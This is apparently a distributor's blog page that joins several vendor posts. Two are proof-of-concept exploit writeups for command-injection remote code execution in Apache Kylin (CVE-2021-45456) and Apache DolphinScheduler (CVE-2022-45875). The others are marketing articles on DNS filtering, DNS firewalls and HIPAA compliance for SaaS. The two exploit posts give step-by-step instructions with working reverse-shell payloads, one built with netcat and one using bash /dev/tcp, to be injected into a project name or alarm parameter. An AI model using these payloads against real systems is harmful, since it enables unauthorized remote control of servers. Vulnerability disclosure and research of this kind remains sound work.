Skip to content

CVE-2021-45456: Apache Kylin RCE PoC

Introduction

Command injection in #Apache Kylin has been found and registered as #CVE-2021-45456, in vsociety we managed to leverage it to RCE and create PoC.

Analysis for this CVE is coming soon, so stay tuned to understand more in-depth about how this vulnerability works.

Proof of concept

  • Add a project

  • No characters are allowed except _ , therefore the name of the project is based on the payload but stripped from characters as follows:


    my payload is nc -c sh 172.17.0.1 9001 so the project name is nccsh17217019001




  • Go to “System”

  • Turn proxy on

  • Click “Diagnosis” and intercept the request


  • Send it to the repeater and drop this request

  • The payload after encoding %60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60


    The decoded payload

    `nc -c sh 172.17.0.1 9001`


  • Replace the project name with the encoded payload


  • Run the listener and send the request



NOTES

  1. Adding any / encoded or not in the payload will not work. Check the analysis on vsociety for more information.

  2. You need permission to create a project, so the name of the project can be based on the payload.

  3. The exploitation will not succeed if the project name is modified by adding any additional letter to the payload in the request.

  4. The ip and port should be part of the name, the IP without . and you add the dots . later as URL encoded.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

CVE-2022-45875: Apache DolphinScheduler Remote Code Execution PoC

Introduction

Improper Input Validation leads to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875 We already published the analysis blog for this CVE, breaking down what’s going behind the scenes, you can check it from here: https://www.vicarius.io/vsociety/blog/cve-2022-45875-apache-dolphinscheduler-vulnerable-to-improper-input-validation-leads-to-rce

Remote Code Execution PoC

  • Supposing you already found an alarm you can edit or create a new one.
  • Add the following payload '; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;# to the “User Params”
  • Run your listener
  • There are two ways to lunch the exploit now
    • Go to “Projects>Click on the project name>Worflow Definition>Start” This is already mentioned in the analysis blog.
    • Go to “Projects>Click on the project name>Worflow instance>Rerun”  

NOTES

  1. Usually, when you access Apache DolphinScheduler you will find tenants, alarms, and project, workflows are ready.
  2. You need to make sure that you have the permissions to edit the alarm so you can add your payload, and at least run workflow so you can decide which alarm group will run for notification. if you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
  3. You need a script that exists in the server already, so when the alarm gets triggered it will trigger the payload as well because there are multiple checks and one of them check if the script file exists or not. for more information about this check the analysis blog.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

SafeDNS Course: The Basics of Web Filtering and SafeDNS Dashboard Settings

The internet plays a vital role in our daily lives, but its growth has led to online threats such as malicious websites, phishing scams, and malware that can harm your online security. Protecting your network from such threats is critical, and that’s where SafeDNS comes in.To help you understand how to use SafeDNS and web filtering, we’re excited to introduce the SafeDNS course on the basics of web filtering and SafeDNS dashboard settings. This course is designed to teach you how to use the SafeDNS dashboard to configure web filtering settings and monitor network activity. The course is divided into modules, each covering a specific topic related to web filtering and SafeDNS. Some of the topics covered include:
  • Introduction to web filtering
  • Creating allowlists and denylists
  • Setting up custom filtering rules
  • Monitoring network activity
  • SafeDNS dashboard settings and configuration
To complete the course, you’ll need to create a SafeDNS account. Once you’ve registered, you’ll have access to the SafeDNS dashboard and be able to follow along with the course material. The course is designed to be self-paced, and you can complete the modules at your own convenience. Upon completion of the course, you’ll receive a certificate of attendance, which demonstrates your expertise in web filtering and SafeDNS dashboard settings. This certificate can be valuable for IT professionals who want to demonstrate their expertise to employers or clients. Overall, the SafeDNS course on the basics of web filtering and SafeDNS dashboard settings is an essential resource for anyone who wants to maintain a secure online presence. Whether you’re a small business owner or an IT professional, the course will teach you the fundamentals of web filtering and how to use SafeDNS to protect your network from online threats. So, register today and start learning!

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

DNS Filtering & DNS Firewall: Any Difference?

In the digital age, cybersecurity is a top concern for businesses and individuals alike. One of the most important aspects of online security is filtering unwanted content and preventing unauthorized access to networks. Two commonly used technologies for this purpose are firewalls and content filtering. However, there is often confusion around the terminology used to describe these technologies, particularly in relation to DNS filtering. In this article, we will explore the differences between firewalls, content filtering, and DNS filtering, and clarify the terminology used to describe each.


What is a Firewall?

A firewall is a security system designed to monitor and control incoming and outgoing network traffic based on predefined security rules. Firewalls can be implemented at different levels of the network, including the hardware level, operating system level, and application level. Firewalls can block unwanted traffic, detect and prevent unauthorized access, and protect against malware and other security threats.

What is Content Filtering?

Content filtering refers to the process of blocking or allowing access to certain types of content based on predefined criteria. Content filtering can be done at the network level or at the endpoint level, and can be based on a variety of factors, including keywords, categories, file types, and more. Content filtering is often used to block access to inappropriate or harmful websites, or to prevent employees from accessing non-work-related content during work hours.

What is DNS Filtering?

DNS filtering is a type of content filtering that is based on domain name system (DNS) queries. DNS filtering works by intercepting DNS queries and determining whether to allow or block the requested domain based on predefined criteria. DNS filtering can be used to block access to known malicious domains, prevent access to specific categories of content, and enforce company policies related to internet usage.

Why do DNS filters and DNS Firewalls get mixed up?

One reason for the confusion between DNS filtering and DNS firewall is that both technologies operate at the DNS level. However, while DNS filtering is a type of content filtering that focuses on blocking or allowing access to specific domains, DNS firewalling is a more comprehensive approach that involves blocking or allowing traffic based on a wide range of criteria, including IP addresses, ports, protocols, and more. In essence, DNS filtering is a subset of DNS firewalling, but the two terms are often used interchangeably, which can lead to confusion.

Are they the same or different, then?

While DNS filtering is often referred to as a DNS firewall, this is not entirely accurate. A DNS firewall is a security system that is designed to prevent attacks that exploit DNS vulnerabilities, such as DNS cache poisoning or DNS amplification attacks. DNS filtering, on the other hand, is a content filtering technology that is designed to block or allow access to specific domains based on predefined criteria. While both technologies operate at the DNS level, they have different purposes and should be referred to using the appropriate terminology.

It’s crucial for cybersecurity companies to have a clear understanding of what “DNS Firewall” really means and to ensure that they can deliver exactly what their clients expect from them, without any confusion or uncertainty. While this term is used in many definitions and contexts, it can sometimes be difficult to know exactly what you’re getting. That’s why it’s important to choose a cybersecurity provider that you can trust to provide the services they promise. At SafeDNS, we started out as a content filter, and we have built our reputation on being transparent and delivering exactly what we say we will. When you work with us, you can have confidence that you are getting the protection and security you need, without any guesswork or uncertainty. Choose SafeDNS and let us help you stay safe and secure online.

If you’re interested in protecting your network and employees from harmful content and malicious domains, sign up for a free trial of SafeDNS today.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

HIPAA compliance for SaaS: a guide for healthcare providers

As healthcare providers increasingly rely on Software-as-a-Service (SaaS) applications to manage patient data, it is crucial for them to understand the importance of HIPAA compliance.

This article will discuss what healthcare organizations need to know about HIPAA compliance for SaaS and how to ensure that their SaaS applications follow industry-specific regulations.

What does HIPAA compliance mean for SaaS?

When it comes to HIPAA compliance, SaaS providers fall into two broad categories: developers and app providers and SaaS hosting services. The two groups have different compliance needs, so it’s helpful to discuss them separately.

SaaS developers and providers

SaaS developers and providers that serve the healthcare sector must ensure their products are HIPAA compliant.

HIPAA compliance means that SaaS developers and service providers adhere to HIPAA’s Security, Privacy, and Breach Notification rules. The most important section here is the HIPAA Security Rule, which has three sub-sections: technical, administrative, and physical.

Under the HIPAA Security Rule, Covered Entities (CEs) and Business Associates (BAs) must put in place protective measures to secure Protected Health Information (PHI). SaaS companies tend to fall under the Business Associate header.

SaaS providers must sign Business Associate Agreements (BAAs) with clients. These agreements set out areas of responsibility and liability. Both healthcare companies and cloud providers should be clear about sharing compliance duties and protecting patient data.

SaaS hosting services

The situation is less clear about SaaS hosting services. HIPAA security rule does not set clear guidelines for cloud computing companies hosting healthcare services. Yet, it has become increasingly important to brand cloud infrastructure as HIPAA-eligible.

HIPAA-eligible hosts offer products that clients can adapt to meet HIPAA standards. This reassures clients that shared cloud computing architecture is properly secured. The major cloud platforms offer HIPAA-eligible services, including Amazon Web Services, Microsoft Azure, and Google Cloud.

Important HIPAA compliance areas for companies and SaaS providers

Not all SaaS companies working in the healthcare sector need to worry about HIPAA compliance. For example, many health app developers won’t handle patient records if their involvement ends when the app is delivered to clients.

But this changes if DevOps teams maintain and update cloud apps for health companies. If you handle Protected Health Information or could access PHI during development tasks, you must be HIPAA compliant.

Generally speaking, HIPAA compliance is critical for providers of SaaS-based healthcare services such as monitoring apps, payment portals, or insurance management tools. And compliance is also a concern for services that host PHI on cloud infrastructure.

Specifically, healthcare organizations need to protect patient data:

  • When creating patient records

  • When information is received

  • When PHI is at rest on cloud resources

  • During transmission (if this involves SaaS infrastructure or apps).

HIPAA requirements for SaaS providers

What does the process of becoming HIPAA-compliant look like? Under the HIPAA Privacy rule, there are three main areas of focus.

Firstly, achieving SaaS data security involves creating robust technical controls. This could include encryption of data in transit and at rest. It also includes access controls to prevent unauthorized access to confidential data. Multi-factor authentication, firewall protection, and password management systems all contribute.

On the administrative side, SaaS companies must train workers to use SaaS tools safely. They must also have robust data handling policies and device usage rules to prevent the unsafe movement of patient data.

Finally, physical security measures include securing data centers via locks, authorization systems, and cameras. There should be measures to protect physical devices on and off-site and plans to guard data against natural disasters and sabotage.

Business Associate Agreements cover all three of these areas. The Covered Entity and Business Associate sign BAAs before commencing their business partnership.

The BAA describes the areas of responsibility of clients and SaaS providers. It includes details on how to achieve compliance. And it explains how partners will be liable when security breaches occur.

Sharing compliance responsibilities

Under the Privacy Rule. SaaS partners and Covered Entities have shared responsibility for protecting patient data.

Cloud Service Providers guard infrastructure and data at rest on their servers. Service users manage access control, data in transit, and how users interact with their apps. This situation applies in healthcare as well. But controls on data access are much tighter.

HIPAA-compliant SaaS hosts and providers must apply the strongest possible encryption to all confidential data. They are responsible for ensuring data is available when requested. Servers must also remain online when healthcare organizations need them.

SaaS hosts manage the physical safety of hosting infrastructure. SaaS providers handle the integrity of application code. They must guard against emerging threats like Zero Day Exploits and ensure healthcare apps are as secure as possible.

Healthcare organizations (Covered Entities) have different responsibilities. Healthcare organizations must train staff to use SaaS services safely. Every covered entity needs to educate users about safe remote access, using encryption, managing passwords, and avoiding phishing attacks.

Healthcare organizations also deal with access controls. They must ensure PHI is only available to authorized professionals or patients themselves.

Most cloud-based cyber attacks have their roots in unsafe user behavior or loose access controls. Provider-side security is critical. Yet, it’s also important for SaaS providers and hosts to tighten their HIPAA compliance.

Healthcare organizations and SaaS partners should know exactly how to share responsibility and take appropriate action to ensure watertight compliance.

Implementing HIPAA compliance measures

A robust HIPAA compliance plan ensures that SaaS companies follow HIPAA’s Security, Privacy, and Breach Notification rules. Dividing your compliance plan between the three HIPAA regulations is good practice.

Compliance plans cover many areas, and the exact make-up varies between organizations. But common elements include:

Risk management

Create risk management plans for all critical data protection risks. Risk assessment processes should include risk severity and actions required to mitigate each risk.

Project ownership

Appoint individuals with responsibility for HIPAA privacy and security management.

Security controls

This includes physical safeguards such as cameras and locks. Data protection controls are also crucial. Use encryption, access management, endpoint protection, and monitoring tools to track user activity,

Administrative safeguards

This could include training plans to educate workers and communicate HIPAA responsibilities.

Auditing

Regular compliance audits ensure controls function properly and that staff training achieves the desired results.

Systems to receive and act on HIPAA complaints

Create a secure email or phone line to report PHI violations. Organizations must make data available to patients and have streamlined processes to report data breaches to regulators.

Documentation

Create and store clear documentation outlining HIPAA compliance policies. Make documents available to staff members and regulators if needed.

Handling third parties and associates

HIPAA-compliant organizations must have solid procedures to onboard business associates. SaaS partners should be able to provide clear evidence of compliance and HIPAA eligibility (if needed).

Clients should immediately know that the SaaS provider is a dependable and secure partner. If you have not done so, plan to achieve recognized security standards such as NIST 800-53, ISO 27001, or ISO 20000-1.

How can NordLayer help?

Becoming HIPAA compliant can be challenging for SaaS developers and service providers. But if you want to thrive in the healthcare sector, a strong compliance plan is essential. Nordlayer’s HIPAA-compliant solution can help you make the changes needed when building a reputation in SaaS health provision.

Our network security solutions include the following:

  • Streamlined network access controls to ensure only authorized users can access PHI.

  • Secure Remote Access from all endpoints ensures equally secure and protected network access for remote and hybrid work environments without putting health data at risk.

  • 256-bit AES encrypts data that is being sent between networks and reduces data breach risks.

  • Compatibility with major cloud platforms such as Azure and AWS. Integrate Secure Remote Access with cloud-native controls to create a solid HIPAA security setup.

All SaaS companies operating in the health sector need rock-solid data protection that complies with HIPAA regulations. Explore your options and ensure safe access to PHI with Nordlayer’s assistance.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×